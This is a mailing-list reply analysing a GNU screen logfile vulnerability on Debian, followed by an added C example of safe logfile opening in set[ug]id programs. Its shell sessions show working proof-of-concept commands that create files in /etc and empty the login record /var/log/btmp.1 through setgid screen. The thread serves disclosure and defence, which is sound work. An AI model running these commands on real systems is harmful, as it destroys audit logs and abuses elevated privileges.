Hi, not replying on Savannah as I don't yet get the exact impact of this.
On Tue, Jan 24, 2017 at 07:05:10PM +0000, anonymous wrote:
> > buczek@theinternet:/etc (master)$ screen -D -m -L bla.bla echo fail
> > buczek@theinternet:/etc (master)$ ls -l bla.bla
> > -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> > buczek@theinternet:/etc (master)$ cat bla.bla
> > fail
> > buczek@theinternet:/etc (master)$

On Debian Unstable this does not work as a root exploit, as screen does not run setuid. screen nevertheless runs setgid with group utmp:

-rwxr-sr-x 1 root utmp 457608 Jan 18 16:54 /usr/bin/screen*

So I'm able to gain access to /var/log/{btmp,wtmp,lastlog}*. I can't really write to them, though, just erase them:

/var/log → id
uid=1000(abe) gid=1000(abe) groups=1000(abe),4(adm),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev),113(kvm)
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 384 Dec 24 17:03 btmp.1
/var/log → screen -D -m -L btmp.1 echo fail
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 0 Jan 24 21:06 btmp.1

So in my case nothing got written into the file (trying an existing file without write permissions to the according directory).

Running the same game in /var/run/screen, which is group-writable for utmp, I can reproduce this a little bit better, though:

/var/run/screen → ls -l
total 0
drwx------ 2 abe  abe  40 Jan 24 21:17 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
/var/run/screen → screen -D -m -L bla.bla echo fail
/var/run/screen → ls -l
total 4
drwx------ 2 abe  abe  40 Jan 24 21:20 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
-rw-r--r-- 1 abe  utmp  6 Jan 24 21:20 bla.bla
/var/run/screen → cat bla.bla
fail
/var/run/screen →

Am I right that, since screen later drops the set[ug]id rights, this only works if the file is newly created, because then it is created with such permissions that I can later write into it without set[ug]id?
Kind regards, Axel
-- 
/~\  Plain Text Ribbon Campaign                   | Axel Beckert
\ /  Say No to HTML in E-Mail and News            | a...@deuxchevaux.org  (Mail)
 X   See http://www.nonhtmlmail.org/campaign.html | a...@noone.org (Mail+Jabber)
/ \  I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/  (Web)
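The mechanism Axel asks about at the end of his mail (a logfile that is created while the process still holds the set-gid group ends up owned by that group, and the caller can then write to it after screen has dropped its privileges) is the general hazard for any set[ug]id program that opens a user-supplied logfile path. The following is an added example written for this page; it is not screen's code and not part of the thread. It shows the defensive pattern from the maintainer's side: switch the effective ids back to the real ids before open(2), refuse symlinks with O_NOFOLLOW, append rather than truncate, and confirm with fstat that the resulting file belongs to the real user. The function names, the self-check helpers and the /tmp paths are assumptions made for the demonstration.

```c
/* Added example (not screen's code): open a log file without letting a
 * set-user-ID / set-group-ID program's elevated ids leak into the file's
 * ownership or into an attacker-chosen target. Linux/glibc assumed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Open (or create) `path` using only the caller's real uid/gid.
 * Returns a descriptor, or -1 with errno set. The effective ids are
 * restored before returning, whatever the outcome of open(2). */
int open_log_as_real_user(const char *path)
{
    uid_t euid = geteuid(), ruid = getuid();
    gid_t egid = getegid(), rgid = getgid();

    /* Drop gid first (needs the privileged euid), then uid. Both are no-ops
     * when the binary is not set[ug]id, so the function is safe everywhere. */
    if (setegid(rgid) == -1 || seteuid(ruid) == -1)
        return -1;

    /* O_NOFOLLOW: a symlink at the final component fails with ELOOP.
     * O_APPEND instead of O_TRUNC: an existing file is never emptied.
     * 0600: no group/world access on a freshly created log. */
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    int saved_errno = errno;

    /* Regain the saved ids in the reverse order. */
    if (seteuid(euid) == -1 || setegid(egid) == -1) {
        if (fd != -1) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* 1 if `fd` is a regular file owned by the real user, else 0. */
int log_owned_by_real_user(int fd)
{
    struct stat st;
    if (fstat(fd, &st) == -1)
        return 0;
    return S_ISREG(st.st_mode) && st.st_uid == getuid() && st.st_gid == getgid();
}

/* Self-check: create a log in /tmp (constructed path), verify ownership,
 * clean up. Returns 1 on success. */
int selfcheck_create(void)
{
    char path[64];
    snprintf(path, sizeof path, "/tmp/openlog_example_%ld", (long)getpid());
    int fd = open_log_as_real_user(path);
    if (fd == -1)
        return 0;
    int ok = log_owned_by_real_user(fd);
    close(fd);
    unlink(path);
    return ok;
}

/* Self-check: a symlink in place of the log path must be refused (ELOOP).
 * Returns 1 if it was refused. */
int selfcheck_symlink_refused(void)
{
    char target[64], link[64];
    snprintf(target, sizeof target, "/tmp/openlog_target_%ld", (long)getpid());
    snprintf(link, sizeof link, "/tmp/openlog_link_%ld", (long)getpid());
    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t == -1)
        return 0;
    close(t);
    if (symlink(target, link) == -1) {
        unlink(target);
        return 0;
    }
    int fd = open_log_as_real_user(link);
    int refused = (fd == -1 && errno == ELOOP);
    if (fd != -1)
        close(fd);
    unlink(link);
    unlink(target);
    return refused;
}

int main(void)
{
    printf("create as real user: %s\n", selfcheck_create() ? "ok" : "FAILED");
    printf("symlink refused:     %s\n", selfcheck_symlink_refused() ? "ok" : "FAILED");
    return 0;
}
```

Run unprivileged, both checks pass trivially because the effective and real ids coincide; the value of the pattern shows when the same binary is installed set-gid utmp or set-uid root, where the file created by open_log_as_real_user still belongs to the invoking user rather than to utmp or root, and an existing file such as btmp.1 is neither truncated nor reachable through a planted symlink.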